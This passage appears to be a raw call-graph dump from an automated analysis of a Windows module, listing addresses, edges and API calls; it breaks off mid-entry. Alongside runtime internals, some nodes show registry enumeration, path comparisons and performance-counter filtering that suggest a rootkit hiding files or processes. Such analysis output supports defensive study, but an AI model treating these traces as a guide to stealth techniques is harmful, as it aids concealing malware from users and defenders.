8902->8903 8907 225dc648cb8 __CxxCallCatchBlock 9 API calls 8903->8907 8909 225dc64bb8f __CxxCallCatchBlock 8903->8909 8904 225dc648fe4 _CreateFrameInfo 9 API calls 8905 225dc64bba2 8904->8905 8906 225dc648fe4 _CreateFrameInfo 9 API calls 8905->8906 8908 225dc64bbab 8906->8908 8907->8909 8909->8904 8910 225dc6546e8 8911 225dc6546f9 CloseHandle 8910->8911 8912 225dc6546ff 8910->8912 8911->8912 8167 225dc6523f0 8170 225dc64f5e0 8167->8170 8171 225dc64f632 8170->8171 8172 225dc64f5ed 8170->8172 8176 225dc64d84c 8172->8176 8174 225dc64f61c 8193 225dc64f2b8 8174->8193 8177 225dc64d878 FlsSetValue 8176->8177 8178 225dc64d85d FlsGetValue 8176->8178 8180 225dc64d885 8177->8180 8181 225dc64d86a 8177->8181 8179 225dc64d872 8178->8179 8178->8181 8179->8177 8182 225dc64e01c _invalid_parameter_noinfo 11 API calls 8180->8182 8181->8174 8183 225dc64d894 8182->8183 8184 225dc64d8b2 FlsSetValue 8183->8184 8185 225dc64d8a2 FlsSetValue 8183->8185 8187 225dc64d8be FlsSetValue 8184->8187 8188 225dc64d8d0 8184->8188 8186 225dc64d8ab 8185->8186 8189 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8186->8189 8187->8186 8190 225dc64d4e4 _invalid_parameter_noinfo 11 API calls 8188->8190 8189->8181 8191 225dc64d8d8 8190->8191 8192 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8191->8192 8192->8181 8216 225dc64f528 8193->8216 8198 225dc64f30a 8198->8171 8199 225dc64d35c 12 API calls 8200 225dc64f31b 8199->8200 8201 225dc64f323 8200->8201 8203 225dc64f332 8200->8203 8202 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8201->8202 8202->8198 8203->8203 8235 225dc64f65c 8203->8235 8206 225dc64f42e 8207 225dc64dffc __std_exception_copy 11 API calls 8206->8207 8209 225dc64f433 8207->8209 8208 225dc64f489 8211 225dc64f4f0 8208->8211 8246 225dc64ede8 8208->8246 8212 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8209->8212 8210 225dc64f448 8210->8208 8213 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8210->8213 8215 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8211->8215 8212->8198 8213->8208 8215->8198 8217 225dc64f54b 8216->8217 8218 225dc64f555 8217->8218 8261 225dc64d2ec EnterCriticalSection 8217->8261 8221 225dc64f2ed 8218->8221 8225 225dc64d84c 16 API calls 8218->8225 8228 225dc64efb8 8221->8228 8226 225dc64f61c 8225->8226 8227 225dc64f2b8 69 API calls 8226->8227 8227->8221 8229 225dc64eb04 23 API calls 8228->8229 8230 225dc64efcc 8229->8230 8231 225dc64efea 8230->8231 8232 225dc64efd8 GetOEMCP 8230->8232 8233 225dc64efff 8231->8233 8234 225dc64efef GetACP 8231->8234 8232->8233 8233->8198 8233->8199 8234->8233 8236 225dc64efb8 25 API calls 8235->8236 8237 225dc64f689 8236->8237 8238 225dc64f7df 8237->8238 8240 225dc64f6c6 IsValidCodePage 8237->8240 8245 225dc64f6e0 _invalid_parameter_noinfo 8237->8245 8239 225dc647d30 _log10_special 8 API calls 8238->8239 8241 225dc64f425 8239->8241 8240->8238 8242 225dc64f6d7 8240->8242 8241->8206 8241->8210 8243 225dc64f706 GetCPInfo 8242->8243 8242->8245 8243->8238 8243->8245 8262 225dc64f0d0 8245->8262 8333 225dc64d2ec EnterCriticalSection 8246->8333 8263 225dc64f10d GetCPInfo 8262->8263 8264 225dc64f203 8262->8264 8263->8264 8265 225dc64f120 8263->8265 8266 225dc647d30 _log10_special 8 API calls 8264->8266 8273 225dc651e94 8265->8273 8267 225dc64f2a2 8266->8267 8267->8238 8272 225dc652358 40 API calls 8272->8264 8274 225dc64eb04 23 API calls 8273->8274 8275 225dc651ed6 8274->8275 8276 225dc64f9cc MultiByteToWideChar 8275->8276 8278 225dc651f0c 8276->8278 8277 225dc651f13 8280 225dc647d30 _log10_special 8 API calls 8277->8280 8278->8277 8279 225dc64d35c 12 API calls 8278->8279 8281 225dc651fd0 8278->8281 8284 225dc651f3c _invalid_parameter_noinfo 8278->8284 8279->8284 8282 225dc64f197 8280->8282 8281->8277 8283 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8281->8283 8288 225dc652358 8282->8288 8283->8277 8284->8281 8285 225dc64f9cc MultiByteToWideChar 8284->8285 8286 225dc651fb2 8285->8286 8286->8281 8287 225dc651fb6 GetStringTypeW 8286->8287 8287->8281 8289 225dc64eb04 23 API calls 8288->8289 8290 225dc65237d 8289->8290 8293 225dc652024 8290->8293 8294 225dc652065 8293->8294 8295 225dc64f9cc MultiByteToWideChar 8294->8295 8298 225dc6520af 8295->8298 8296 225dc65232d 8297 225dc647d30 _log10_special 8 API calls 8296->8297 8299 225dc64f1ca 8297->8299 8298->8296 8300 225dc64d35c 12 API calls 8298->8300 8302 225dc6520e7 8298->8302 8314 225dc6521e5 8298->8314 8299->8272 8300->8302 8301 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8301->8296 8303 225dc64f9cc MultiByteToWideChar 8302->8303 8302->8314 8304 225dc65215a 8303->8304 8304->8314 8324 225dc64ffcc 8304->8324 8307 225dc6521f6 8309 225dc6522c8 8307->8309 8310 225dc64d35c 12 API calls 8307->8310 8313 225dc652214 8307->8313 8308 225dc6521a5 8311 225dc64ffcc 6 API calls 8308->8311 8308->8314 8312 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8309->8312 8309->8314 8310->8313 8311->8314 8312->8314 8313->8314 8315 225dc64ffcc 6 API calls 8313->8315 8314->8296 8314->8301 8316 225dc652294 8315->8316 8316->8309 8317 225dc6522ca 8316->8317 8318 225dc6522b4 8316->8318 8320 225dc64fa5c WideCharToMultiByte 8317->8320 8319 225dc64fa5c WideCharToMultiByte 8318->8319 8321 225dc6522c2 8319->8321 8320->8321 8321->8309 8322 225dc6522e2 8321->8322 8322->8314 8323 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8322->8323 8323->8314 8325 225dc64fce4 5 API calls 8324->8325 8326 225dc65000a 8325->8326 8327 225dc650012 8326->8327 8330 225dc6500b8 8326->8330 8327->8307 8327->8308 8327->8314 8329 225dc65007b LCMapStringW 8329->8327 8331 225dc64fce4 5 API calls 8330->8331 8332 225dc6500e6 8331->8332 8332->8329 9177 225dc656179 9178 225dc648fe4 _CreateFrameInfo 9 API calls 9177->9178 9179 225dc656187 9178->9179 9180 225dc656192 9179->9180 9181 225dc648fe4 _CreateFrameInfo 9 API calls 9179->9181 9181->9180 8592 225dc645c7c 8593 225dc645c83 8592->8593 8594 225dc645cb0 VirtualProtect 8593->8594 8596 225dc645bc0 8593->8596 8595 225dc645cd9 GetLastError 8594->8595 8594->8596 8595->8596 8913 225dc6422fc GetProcessIdOfThread GetCurrentProcessId 8914 225dc642327 CreateFileW 8913->8914 8916 225dc6423a2 8913->8916 8915 225dc64235b WriteFile ReadFile CloseHandle 8914->8915 8914->8916 8915->8916 8917 225dc653efb 8918 225dc653f3b 8917->8918 8919 225dc6541a0 8917->8919 8918->8919 8921 225dc653f6f 8918->8921 8922 225dc654182 8918->8922 8920 225dc654196 8919->8920 8923 225dc654cb0 _log10_special 20 API calls 8919->8923 8925 225dc654cb0 8922->8925 8923->8920 8928 225dc654cd0 8925->8928 8929 225dc654cea 8928->8929 8930 225dc654ccb 8929->8930 8932 225dc654b10 8929->8932 8930->8920 8933 225dc654b50 _log10_special 8932->8933 8934 225dc654bbc _log10_special 8933->8934 8943 225dc654dd0 8933->8943 8936 225dc654bf9 8934->8936 8937 225dc654bc9 8934->8937 8950 225dc655100 8936->8950 8946 225dc6549ec 8937->8946 8940 225dc654bf7 _log10_special 8941 225dc647d30 _log10_special 8 API calls 8940->8941 8942 225dc654c21 8941->8942 8942->8930 8956 225dc654df8 8943->8956 8947 225dc654a30 _log10_special 8946->8947 8948 225dc654a45 8947->8948 8949 225dc655100 _log10_special 11 API calls 8947->8949 8948->8940 8949->8948 8951 225dc655109 8950->8951 8952 225dc655120 8950->8952 8954 225dc655118 8951->8954 8955 225dc64dffc __std_exception_copy 11 API calls 8951->8955 8953 225dc64dffc __std_exception_copy 11 API calls 8952->8953 8953->8954 8954->8940 8955->8954 8957 225dc654e37 _raise_exc _clrfp 8956->8957 8958 225dc65504c RaiseException 8957->8958 8959 225dc654df2 8958->8959 8959->8934 8334 225dc651df8 8335 225dc651e00 8334->8335 8336 225dc651e15 8335->8336 8337 225dc651e2e 8335->8337 8338 225dc64dffc __std_exception_copy 11 API calls 8336->8338 8340 225dc64eb04 23 API calls 8337->8340 8342 225dc651e25 8337->8342 8339 225dc651e1a 8338->8339 8341 225dc64dec0 _invalid_parameter_noinfo 49 API calls 8339->8341 8340->8342 8341->8342 8597 225dc64da78 8598 225dc64da88 8597->8598 8599 225dc64d8f0 __std_exception_copy 11 API calls 8598->8599 8600 225dc64da93 __vcrt_uninitialize_ptd 8598->8600 8599->8600 9182 225dc64bd78 9189 225dc64bcab __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9182->9189 9183 225dc64bd9f 9184 225dc648fe4 _CreateFrameInfo 9 API calls 9183->9184 9185 225dc64bda4 9184->9185 9186 225dc648fe4 _CreateFrameInfo 9 API calls 9185->9186 9187 225dc64bdaf __FrameHandler3::GetHandlerSearchState 9185->9187 9186->9187 9188 225dc64a448 9 API calls Is_bad_exception_allowed 9188->9189 9189->9183 9189->9187 9189->9188 9191 225dc64a470 9189->9191 9192 225dc648fe4 _CreateFrameInfo 9 API calls 9191->9192 9193 225dc64a47e 9192->9193 9193->9189 8601 225dc64ce84 8604 225dc64cc34 8601->8604 8611 225dc64cbfc 8604->8611 8612 225dc64cc0c 8611->8612 8613 225dc64cc11 8611->8613 8614 225dc64cbb8 11 API calls 8612->8614 8615 225dc64cc18 8613->8615 8614->8613 8616 225dc64cc28 8615->8616 8617 225dc64cc2d 8615->8617 8618 225dc64cbb8 11 API calls 8616->8618 8619 225dc64cbb8 8617->8619 8618->8617 8620 225dc64cbbd 8619->8620 8624 225dc64cbee 8619->8624 8621 225dc64cbe6 8620->8621 8622 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8620->8622 8623 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8621->8623 8622->8620 8623->8624 9194 225dc650180 GetProcessHeap 8625 225dc647e80 8626 225dc647e89 __scrt_acquire_startup_lock 8625->8626 8628 225dc647e8d 8626->8628 8629 225dc64c8ac 8626->8629 8630 225dc64c8cc 8629->8630 8639 225dc64c8e3 8629->8639 8631 225dc64c8ea 8630->8631 8632 225dc64c8d4 8630->8632 8634 225dc64f5e0 69 API calls 8631->8634 8633 225dc64dffc __std_exception_copy 11 API calls 8632->8633 8635 225dc64c8d9 8633->8635 8636 225dc64c8ef 8634->8636 8637 225dc64dec0 _invalid_parameter_noinfo 49 API calls 8635->8637 8660 225dc64ecc4 GetModuleFileNameW 8636->8660 8637->8639 8639->8628 8643 225dc64c84c 11 API calls 8644 225dc64c959 8643->8644 8645 225dc64c979 8644->8645 8646 225dc64c961 8644->8646 8648 225dc64c684 23 API calls 8645->8648 8647 225dc64dffc __std_exception_copy 11 API calls 8646->8647 8649 225dc64c966 8647->8649 8653 225dc64c995 8648->8653 8650 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8649->8650 8650->8639 8651 225dc64c99b 8652 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8651->8652 8652->8639 8653->8651 8654 225dc64c9c7 8653->8654 8655 225dc64c9e0 8653->8655 8656 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8654->8656 8657 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8655->8657 8658 225dc64c9d0 8656->8658 8657->8651 8659 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8658->8659 8659->8639 8661 225dc64ed09 GetLastError 8660->8661 8662 225dc64ed1d 8660->8662 8678 225dc64df70 8661->8678 8664 225dc64eb04 23 API calls 8662->8664 8666 225dc64ed4b 8664->8666 8665 225dc64ed16 8667 225dc647d30 _log10_special 8 API calls 8665->8667 8668 225dc64fef8 5 API calls 8666->8668 8671 225dc64ed5c 8666->8671 8670 225dc64c906 8667->8670 8668->8671 8672 225dc64c684 8670->8672 8683 225dc64eba8 8671->8683 8674 225dc64c6c2 8672->8674 8676 225dc64c72e 8674->8676 8697 225dc64f990 8674->8697 8675 225dc64c81f 8675->8643 8676->8675 8677 225dc64f990 23 API calls 8676->8677 8677->8676 8679 225dc64d8f0 __std_exception_copy 11 API calls 8678->8679 8680 225dc64df7d Concurrency::details::SchedulerProxy::DeleteThis 8679->8680 8681 225dc64d8f0 __std_exception_copy 11 API calls 8680->8681 8682 225dc64df9f 8681->8682 8682->8665 8684 225dc64ebe7 8683->8684 8686 225dc64ebcc 8683->8686 8685 225dc64ebec 8684->8685 8687 225dc64fa5c WideCharToMultiByte 8684->8687 8685->8686 8689 225dc64dffc __std_exception_copy 11 API calls 8685->8689 8686->8665 8688 225dc64ec43 8687->8688 8688->8685 8690 225dc64ec4a GetLastError 8688->8690 8691 225dc64ec75 8688->8691 8689->8686 8692 225dc64df70 11 API calls 8690->8692 8693 225dc64fa5c WideCharToMultiByte 8691->8693 8694 225dc64ec57 8692->8694 8695 225dc64ec9c 8693->8695 8696 225dc64dffc __std_exception_copy 11 API calls 8694->8696 8695->8686 8695->8690 8696->8686 8698 225dc64f91c 8697->8698 8699 225dc64eb04 23 API calls 8698->8699 8700 225dc64f940 8699->8700 8700->8674 9195 225dc642f80 9196 225dc642fa7 9195->9196 9197 225dc643074 9196->9197 9198 225dc642fc4 PdhGetCounterInfoW 9196->9198 9198->9197 9199 225dc642fe6 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9198->9199 9200 225dc643018 StrCmpW 9199->9200 9201 225dc643060 GetProcessHeap HeapFree 9199->9201 9200->9201 9202 225dc64302d 9200->9202 9201->9197 9202->9201 9203 225dc643520 12 API calls 9202->9203 9203->9202 9204 225dc655f7f 9205 225dc655f97 9204->9205 9211 225dc656002 9204->9211 9206 225dc648fe4 _CreateFrameInfo 9 API calls 9205->9206 9205->9211 9207 225dc655fe4 9206->9207 9208 225dc648fe4 _CreateFrameInfo 9 API calls 9207->9208 9209 225dc655ff9 9208->9209 9210 225dc64cff8 23 API calls 9209->9210 9210->9211 8701 225dc64fc4c 8702 225dc64fc8b 8701->8702 8703 225dc64fc6e 8701->8703 8705 225dc64fc95 8702->8705 8710 225dc652408 8702->8710 8703->8702 8704 225dc64fc7c 8703->8704 8706 225dc64dffc __std_exception_copy 11 API calls 8704->8706 8717 225dc652444 8705->8717 8709 225dc64fc81 _invalid_parameter_noinfo 8706->8709 8711 225dc65242a HeapSize 8710->8711 8712 225dc652411 8710->8712 8713 225dc64dffc __std_exception_copy 11 API calls 8712->8713 8714 225dc652416 8713->8714 8715 225dc64dec0 _invalid_parameter_noinfo 49 API calls 8714->8715 8716 225dc652421 8715->8716 8716->8705 8718 225dc652459 8717->8718 8719 225dc652463 8717->8719 8720 225dc64d35c 12 API calls 8718->8720 8721 225dc652468 8719->8721 8727 225dc65246f _invalid_parameter_noinfo 8719->8727 8725 225dc652461 8720->8725 8722 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8721->8722 8722->8725 8723 225dc652475 8726 225dc64dffc __std_exception_copy 11 API calls 8723->8726 8724 225dc6524a2 HeapReAlloc 8724->8725 8724->8727 8725->8709 8726->8725 8727->8723 8727->8724 8728 225dc64c1ac _invalid_parameter_noinfo 2 API calls 8727->8728 8728->8727 8343 225dc6425cc 8345 225dc64264b _invalid_parameter_noinfo 8343->8345 8344 225dc64277c 8345->8344 8346 225dc6426ad GetFileType 8345->8346 8347 225dc6426bb StrCpyW 8346->8347 8348 225dc6426d1 8346->8348 8349 225dc6426e0 8347->8349 8359 225dc6419e0 GetFinalPathNameByHandleW 8348->8359 8353 225dc642781 8349->8353 8355 225dc6426ea 8349->8355 8351 225dc643c40 StrCmpNIW 8351->8353 8352 225dc643c40 StrCmpNIW 8352->8355 8353->8344 8353->8351 8354 225dc6432d8 4 API calls 8353->8354 8356 225dc641ce0 2 API calls 8353->8356 8354->8353 8355->8344 8355->8352 8364 225dc6432d8 StrCmpIW 8355->8364 8368 225dc641ce0 8355->8368 8356->8353 8360 225dc641a49 8359->8360 8361 225dc641a0a StrCmpNIW 8359->8361 8360->8349 8361->8360 8362 225dc641a24 lstrlenW 8361->8362 8362->8360 8363 225dc641a36 StrCpyW 8362->8363 8363->8360 8365 225dc64330a StrCpyW StrCatW 8364->8365 8366 225dc643321 PathCombineW 8364->8366 8367 225dc64332a 8365->8367 8366->8367 8367->8355 8369 225dc641d00 8368->8369 8370 225dc641cf7 8368->8370 8369->8355 8371 225dc641534 2 API calls 8370->8371 8371->8369 8372 225dc648bcc 8379 225dc64912c 8372->8379 8375 225dc648bd9 8380 225dc649134 8379->8380 8382 225dc649165 8380->8382 8384 225dc648bd5 8380->8384 8396 225dc64a7a4 8380->8396 8383 225dc649174 __vcrt_uninitialize_locks DeleteCriticalSection 8382->8383 8383->8384 8384->8375 8385 225dc6490c0 8384->8385 8401 225dc64a678 8385->8401 8397 225dc64a528 __vcrt_FlsAlloc 5 API calls 8396->8397 8398 225dc64a7da 8397->8398 8399 225dc64a7e4 8398->8399 8400 225dc64a7ef InitializeCriticalSectionAndSpinCount 8398->8400 8399->8380 8400->8399 8402 225dc64a528 __vcrt_FlsAlloc 5 API calls 8401->8402 8403 225dc64a69d TlsAlloc 8402->8403 8960 225dc647ecc 8967 225dc648bf4 8960->8967 8962 225dc647ed9 8968 225dc649000 _CreateFrameInfo 9 API calls 8967->8968 8969 225dc647ed5 8968->8969 8969->8962 8970 225dc64cf8c 8969->8970 8971 225dc64d8f0 __std_exception_copy 11 API calls 8970->8971 8972 225dc647ee2 8971->8972 8972->8962 8973 225dc648c08 8972->8973 8976 225dc648f9c 8973->8976 8975 225dc648c11 8975->8962 8977 225dc648fc2 __vcrt_freefls 8976->8977 8978 225dc648fad 8976->8978 8977->8975 8979 225dc64a708 _CreateFrameInfo 6 API calls 8978->8979 8980 225dc648fb2 8979->8980 8982 225dc64a750 8980->8982 8983 225dc64a528 __vcrt_FlsAlloc 5 API calls 8982->8983 8984 225dc64a77e 8983->8984 8985 225dc64a790 TlsSetValue 8984->8985 8986 225dc64a788 8984->8986 8985->8986 8986->8977 8729 225dc656245 8730 225dc656254 8729->8730 8732 225dc65625e 8729->8732 8733 225dc64d340 LeaveCriticalSection 8730->8733 8405 225dc642bc8 8406 225dc642c39 8405->8406 8407 225dc642f5c 8406->8407 8408 225dc642c65 GetModuleHandleA 8406->8408 8409 225dc642c89 8408->8409 8410 225dc642c77 GetProcAddress 8408->8410 8409->8407 8411 225dc642cb0 StrCmpNIW 8409->8411 8410->8409 8411->8407 8415 225dc642cd5 8411->8415 8412 225dc64193c 6 API calls 8412->8415 8413 225dc642de7 lstrlenW 8413->8415 8414 225dc642e91 lstrlenW 8414->8415 8415->8407 8415->8412 8415->8413 8415->8414 8416 225dc643c40 StrCmpNIW 8415->8416 8417 225dc641c08 StrCmpIW StrCmpW 8415->8417 8416->8415 8417->8415 7595 225dc641ad0 7602 225dc641630 GetProcessHeap HeapAlloc 7595->7602 7597 225dc641adf 7598 225dc641ae6 SleepEx 7597->7598 7601 225dc6415a0 StrCmpIW StrCmpW 7597->7601 7653 225dc6418bc 7597->7653 7599 225dc641630 50 API calls 7598->7599 7599->7597 7601->7597 7670 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7602->7670 7604 225dc641658 7671 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7604->7671 7606 225dc641660 7672 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7606->7672 7608 225dc641669 7673 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7608->7673 7610 225dc641672 7674 225dc641268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7610->7674 7612 225dc64167b 7675 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7612->7675 7614 225dc641684 7676 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7614->7676 7616 225dc64168d 7677 225dc641000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7616->7677 7618 225dc641696 RegOpenKeyExW 7619 225dc6416c8 RegOpenKeyExW 7618->7619 7620 225dc6418ae 7618->7620 7621 225dc641707 RegOpenKeyExW 7619->7621 7622 225dc6416f1 7619->7622 7620->7597 7623 225dc64172b 7621->7623 7624 225dc641742 RegOpenKeyExW 7621->7624 7684 225dc6412bc RegQueryInfoKeyW 7622->7684 7678 225dc64104c RegQueryInfoKeyW 7623->7678 7627 225dc641766 7624->7627 7628 225dc64177d RegOpenKeyExW 7624->7628 7631 225dc6412bc 16 API calls 7627->7631 7632 225dc6417b8 RegOpenKeyExW 7628->7632 7633 225dc6417a1 7628->7633 7634 225dc641773 RegCloseKey 7631->7634 7636 225dc6417dc 7632->7636 7637 225dc6417f3 RegOpenKeyExW 7632->7637 7635 225dc6412bc 16 API calls 7633->7635 7634->7628 7640 225dc6417ae RegCloseKey 7635->7640 7641 225dc6412bc 16 API calls 7636->7641 7638 225dc641817 7637->7638 7639 225dc64182e RegOpenKeyExW 7637->7639 7642 225dc64104c 6 API calls 7638->7642 7643 225dc641869 RegOpenKeyExW 7639->7643 7644 225dc641852 7639->7644 7640->7632 7645 225dc6417e9 RegCloseKey 7641->7645 7646 225dc641824 RegCloseKey 7642->7646 7648 225dc6418a4 RegCloseKey 7643->7648 7649 225dc64188d 7643->7649 7647 225dc64104c 6 API calls 7644->7647 7645->7637 7646->7639 7650 225dc64185f RegCloseKey 7647->7650 7648->7620 7651 225dc64104c 6 API calls 7649->7651 7650->7643 7652 225dc64189a RegCloseKey 7651->7652 7652->7648 7698 225dc6414a4 7653->7698 7670->7604 7671->7606 7672->7608 7673->7610 7674->7612 7675->7614 7676->7616 7677->7618 7679 225dc6411b5 RegCloseKey 7678->7679 7680 225dc6410bf 7678->7680 7679->7624 7680->7679 7681 225dc6410cf RegEnumValueW 7680->7681 7682 225dc641125 7681->7682 7682->7679 7682->7681 7683 225dc64114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7682->7683 7683->7682 7685 225dc64148a RegCloseKey 7684->7685 7686 225dc641327 GetProcessHeap HeapAlloc 7684->7686 7685->7621 7687 225dc641476 GetProcessHeap HeapFree 7686->7687 7688 225dc641352 RegEnumValueW 7686->7688 7687->7685 7689 225dc6413a5 7688->7689 7689->7687 7689->7688 7691 225dc6413d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7689->7691 7692 225dc64141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 7689->7692 7693 225dc641534 7689->7693 7691->7692 7692->7689 7694 225dc641584 7693->7694 7695 225dc64154e 7693->7695 7694->7689 7695->7694 7696 225dc641565 StrCmpIW 7695->7696 7697 225dc64156d StrCmpW 7695->7697 7696->7695 7697->7695 7699 225dc6414e6 GetProcessHeap HeapFree GetProcessHeap HeapFree 7698->7699 7700 225dc6414c6 GetProcessHeap HeapFree 7698->7700 7700->7699 7700->7700 8418 225dc643fd0 8421 225dc643f1d _invalid_parameter_noinfo 8418->8421 8419 225dc643f87 8420 225dc643f6d VirtualQuery 8420->8419 8420->8421 8421->8419 8421->8420 8422 225dc643fd2 GetLastError 8421->8422 8422->8419 8422->8421 9212 225dc64b750 9213 225dc64b77d __except_validate_context_record 9212->9213 9214 225dc648fe4 _CreateFrameInfo 9 API calls 9213->9214 9215 225dc64b782 9214->9215 9217 225dc64b7dc 9215->9217 9219 225dc64b86a 9215->9219 9226 225dc64b830 9215->9226 9216 225dc64b8d8 9216->9226 9254 225dc64aed0 9216->9254 9218 225dc64b857 9217->9218 9217->9226 9227 225dc64b7fe __FrameHandler3::FrameUnwindToEmptyState 9217->9227 9241 225dc64a04c 9218->9241 9223 225dc64b889 9219->9223 9248 225dc64a448 9219->9248 9223->9216 9223->9226 9251 225dc64a45c 9223->9251 9224 225dc64b981 9227->9224 9229 225dc64bc5c 9227->9229 9230 225dc64a448 Is_bad_exception_allowed 9 API calls 9229->9230 9231 225dc64bc8b __FrameHandler3::FrameUnwindToEmptyState 9230->9231 9232 225dc648fe4 _CreateFrameInfo 9 API calls 9231->9232 9239 225dc64bca8 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9232->9239 9233 225dc64bd9f 9234 225dc648fe4 _CreateFrameInfo 9 API calls 9233->9234 9235 225dc64bda4 9234->9235 9236 225dc648fe4 _CreateFrameInfo 9 API calls 9235->9236 9237 225dc64bdaf __FrameHandler3::GetHandlerSearchState 9235->9237 9236->9237 9237->9226 9238 225dc64a448 9 API calls Is_bad_exception_allowed 9238->9239 9239->9233 9239->9237 9239->9238 9240 225dc64a470 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9239->9240 9240->9239 9311 225dc64a0b0 9241->9311 9243 225dc64a06b __FrameHandler3::ExecutionInCatch 9315 225dc649fbc 9243->9315 9246 225dc64bc5c __FrameHandler3::FrameUnwindToEmptyState 9 API calls 9247 225dc64a0a0 9246->9247 9247->9226 9249 225dc648fe4 _CreateFrameInfo 9 API calls 9248->9249 9250 225dc64a451 9249->9250 9250->9223 9252 225dc648fe4 _CreateFrameInfo 9 API calls 9251->9252 9253 225dc64a465 9252->9253 9253->9216 9319 225dc64bde8 9254->9319 9256 225dc64b397 9257 225dc64b2e8 9257->9256 9298 225dc64b2e6 9257->9298 9372 225dc64b3a0 9257->9372 9258 225dc64b016 9258->9257 9259 225dc64b04e 9258->9259 9266 225dc64b215 9259->9266 9292 225dc64a45c 9 API calls 9259->9292 9344 225dc64b610 9259->9344 9358 225dc64adfc 9259->9358 9261 225dc648fe4 _CreateFrameInfo 9 API calls 9264 225dc64b32a 9261->9264 9262 225dc648fe4 _CreateFrameInfo 9 API calls 9265 225dc64af7d 9262->9265 9264->9256 9268 225dc647d30 _log10_special 8 API calls 9264->9268 9265->9264 9271 225dc648fe4 _CreateFrameInfo 9 API calls 9265->9271 9267 225dc64b236 9266->9267 9270 225dc64a448 Is_bad_exception_allowed 9 API calls 9266->9270 9266->9298 9274 225dc64b258 9267->9274 9267->9298 9365 225dc64a020 9267->9365 9269 225dc64b33d 9268->9269 9269->9226 9270->9267 9273 225dc64af8d 9271->9273 9275 225dc648fe4 _CreateFrameInfo 9 API calls 9273->9275 9276 225dc64b26e 9274->9276 9274->9298 9308 225dc64b37a 9274->9308 9277 225dc64af96 9275->9277 9278 225dc64b279 9276->9278 9281 225dc64a448 Is_bad_exception_allowed 9 API calls 9276->9281 9330 225dc64a488 9277->9330 9284 225dc64be80 9 API calls 9278->9284 9279 225dc648fe4 _CreateFrameInfo 9 API calls 9282 225dc64b380 9279->9282 9281->9278 9285 225dc648fe4 _CreateFrameInfo 9 API calls 9282->9285 9286 225dc64b290 9284->9286 9288 225dc64b389 9285->9288 9291 225dc64a0b0 __GetUnwindTryBlock RtlLookupFunctionEntry 9286->9291 9286->9298 9287 225dc648fe4 _CreateFrameInfo 9 API calls 9290 225dc64afd8 9287->9290 9289 225dc64cff8 23 API calls 9288->9289 9289->9256 9290->9258 9294 225dc648fe4 _CreateFrameInfo 9 API calls 9290->9294 9293 225dc64b2aa 9291->9293 9292->9259 9369 225dc64a2b4 RtlUnwindEx 9293->9369 9296 225dc64afe4 9294->9296 9299 225dc648fe4 _CreateFrameInfo 9 API calls 9296->9299 9298->9261 9300 225dc64afed 9299->9300 9333 225dc64be80 9300->9333 9304 225dc64b001 9340 225dc64bf70 9304->9340 9306 225dc64b374 9307 225dc64cff8 23 API calls 9306->9307 9307->9308 9308->9279 9309 225dc64b009 __CxxCallCatchBlock std::bad_alloc::bad_alloc 9309->9306 9310 225dc648e38 Concurrency::cancel_current_task 2 API calls 9309->9310 9310->9306 9312 225dc64a0de __FrameHandler3::ExecutionInCatch 9311->9312 9313 225dc64a108 RtlLookupFunctionEntry 9312->9313 9314 225dc64a150 9312->9314 9313->9312 9314->9243 9316 225dc64a007 9315->9316 9318 225dc649fdc 9315->9318 9316->9246 9317 225dc648fe4 _CreateFrameInfo 9 API calls 9317->9318 9318->9316 9318->9317 9320 225dc64be0d __FrameHandler3::ExecutionInCatch 9319->9320 9321 225dc64a0b0 __GetUnwindTryBlock RtlLookupFunctionEntry 9320->9321 9322 225dc64be22 9321->9322 9384 225dc64aa58 9322->9384 9325 225dc64be57 9327 225dc64aa58 __GetUnwindTryBlock RtlLookupFunctionEntry 9325->9327 9326 225dc64be34 __FrameHandler3::GetHandlerSearchState 9387 225dc64aa90 9326->9387 9328 225dc64af31 9327->9328 9328->9256 9328->9258 9328->9262 9331 225dc648fe4 _CreateFrameInfo 9 API calls 9330->9331 9332 225dc64a496 9331->9332 9332->9256 9332->9287 9334 225dc64bf67 9333->9334 9339 225dc64beab 9333->9339 9335 225dc64affd 9335->9258 9335->9304 9336 225dc64a45c 9 API calls 9336->9339 9337 225dc64a448 Is_bad_exception_allowed 9 API calls 9337->9339 9338 225dc64b610 9 API calls 9338->9339 9339->9335 9339->9336 9339->9337 9339->9338 9341 225dc64bfdd 9340->9341 9343 225dc64bf8d Is_bad_exception_allowed 9340->9343 9341->9309 9342 225dc64a448 9 API calls 